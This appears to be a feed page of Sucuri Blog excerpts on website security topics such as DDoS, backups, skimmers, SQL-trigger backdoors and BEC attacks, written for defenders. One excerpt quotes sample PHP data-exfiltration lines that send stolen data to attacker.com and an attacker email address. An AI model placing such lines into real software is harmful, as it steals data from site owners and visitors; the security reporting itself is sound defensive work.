How to Know If You Are Under DDoS Attack

http://feedproxy.google.com/~r/sucuri/blog/~3/3kI_jcIxuxw/how-to-know-if-you-are-under-a-ddos-attack.html

Nowadays, the term DDoS probably raises the heart rate of most webmasters. Though many don’t know exactly what a DDoS attack is, they do know the effect: an extremely sluggish or shut-down website.  In this article, we’ll focus on how to know if your website is under attack and how to protect it.   Hopefully, we can help you handle DDoS attacks without having a full blown meltdown.  What is a DDoS Attack?  Continue reading How to Know If You Are Under DDoS Attack at Sucuri Blog.

The Importance of Website Backups

http://feedproxy.google.com/~r/sucuri/blog/~3/giM3k7q8ZZ0/the-importance-of-website-backups.html

Today is World Backup Day. This date was created to remind people of the importance of having backups set up for everything that matters. I am pretty sure your website falls into the category of precious digital assets.   Why are website backups important?  Imagine waking up in the morning to see that a couple of calls were missed and your email is overloaded with messages saying that your website is down. You go to your computer to check your server and it’s working fine – but oh no,  all your files are deleted from the database. Continue reading The Importance of Website Backups at Sucuri Blog.

PHP Repository Exploited by Hackers

http://feedproxy.google.com/~r/sucuri/blog/~3/9GyiBNhWczQ/php-repository-exploited-by-hackers.html

The official PHP git repository, http://git.php.net/, was compromised this Sunday, March 28. An attacker was able to modify the PHP source code twice and inject a backdoor into it. Thankfully, both attempts were quickly detected and removed by the PHP team. Per a statement released in PHP’s internal mailing list, the current investigation believes the git.php.net server itself has been compromised rather than the individual’s account. Everything points towards a compromise of the git.php.net server. Continue reading PHP Repository Exploited by Hackers at Sucuri Blog.

How Do Websites Get Hacked?

http://feedproxy.google.com/~r/sucuri/blog/~3/Bq1525bttf4/how-do-websites-get-hacked.html

As much as the web has grown, surprisingly not a lot has changed in how websites get hacked. The most important thing you can do in keeping the web – and your own sites and visitors – safe is to understand these unchanging truths and hold them close to heart. Consider the Scale of Hacked Websites 1.2 billion sites make up today’s World Wide Web. Assuming a 3-second load time, continuous queries, and not a wink of rest, it’d take you over 160 years to just see every site that currently exists. Continue reading How Do Websites Get Hacked? at […]

Server Side Data Exfiltration via Telegram API

http://feedproxy.google.com/~r/sucuri/blog/~3/ToSI--EOfuM/server-side-data-exfiltration-via-telegram-api.html

One of the themes commonly highlighted on this blog includes the many creative methods and techniques attackers employ to steal data from compromised websites. Credit card skimmers, credential and password hijackers, SQL injections, and even malware on the server level can be used for data exfiltration. What’s more, attackers may be able to accomplish this feat with a few mere lines of code. For example: Emailing the data: @mail(“email@attacker.com”, $_SERVER[“SERVER_NAME”], $stolenData); Writing the data to a local file: fwrite($fh, $stolenData); Sending the data to an email address under the attacker’s control: @file_get_contents(“http://attacker.com/cgi-bin/optimus.pl?prime=$stolenData”); Writing the data to an image file within […]

Magento 2 PHP Credit Card Skimmer Saves to JPG

http://feedproxy.google.com/~r/sucuri/blog/~3/pyFI2EIUYFo/magento-2-php-credit-card-skimmer-saves-to-jpg.html

Bad actors often leverage creative techniques to conceal malicious behaviour and harvest sensitive information from ecommerce websites. A recent investigation for a compromised Magento 2 website revealed a malicious injection that was capturing POST request data from site visitors. Located on the checkout page, it was found to encode captured data before saving it to a .JPG file. Malicious Injection Behavior The following PHP code was found injected to the file ./vendor/magento/module-customer/Model/Session.php. Continue reading Magento 2 PHP Credit Card Skimmer Saves to JPG at Sucuri Blog.

Trojan Spyware and BEC Attacks

http://feedproxy.google.com/~r/sucuri/blog/~3/7CWjK9uypZA/trojan-spyware-and-bec-attacks.html

When it comes to an organization’s security, business email compromise (BEC) attacks are a big problem. One primary reason impacts are so significant is that attacks often use a human victim to authorize a fraudulent transaction to bypass existing security controls that would normally be used to prevent fraud. Another reason is that social engineering lures may be expertly crafted by the attacker after they have been monitoring a victim’s activity for some time, resulting in more effective phishing campaigns with serious security implications. Continue reading Trojan Spyware and BEC Attacks at Sucuri Blog.

SQL Triggers in Website Backdoors

http://feedproxy.google.com/~r/sucuri/blog/~3/YO_WM-0196E/sql-triggers-in-website-backdoors.html

Over the past year, there’s been an increasing trend of WordPress malware using SQL triggers to hide malicious SQL queries within compromised databases. These queries inject an admin level user into the infected database whenever the trigger condition is met. What makes this especially problematic for website owners is that most malware cleanup guides focus on the website files and data within specific database tables  — for example, wp_users, wp_options, and wp_posts. Continue reading SQL Triggers in Website Backdoors at Sucuri Blog.

UCEPROTECT: When RBLs Go Bad

http://feedproxy.google.com/~r/sucuri/blog/~3/1JyimLhEc7A/uceprotect-when-rbls-go-bad.html

Realtime Blackhole Lists (RBLs) can be a great tool in your security arsenal. You may not know you’re using them, but all email providers and company email servers leverage these services to verify whether servers and IP addresses are sending spam or other abusive content against a known list of offenders. These services use a number of methods to compile lists of IP addresses reputed to send spam, mostly populating them using honeypots drawing them in with “poison” email addresses to act as victims. Continue reading UCEPROTECT: When RBLs Go Bad at Sucuri Blog.

Optimizing Performance and Behavior with WordPress and the Sucuri WAF

http://feedproxy.google.com/~r/sucuri/blog/~3/2rl9l8_5oEA/optimizing-performance-and-behavior-with-wordpress-and-the-sucuri-waf.html

Aside from providing significant protection from a wide range of threats, the Sucuri WAF also acts as a CDN due to its caching capabilities and regional PoPs — often performing even better than dedicated CDNs based on recent tests. CDNs can significantly help speed up your website by storing and delivering content as close to the browser as possible, using servers dedicated to that task. What’s more, properly configured caching settings are the best defense against DDoS attacks. Continue reading Optimizing Performance and Behavior with WordPress and the Sucuri WAF at Sucuri Blog.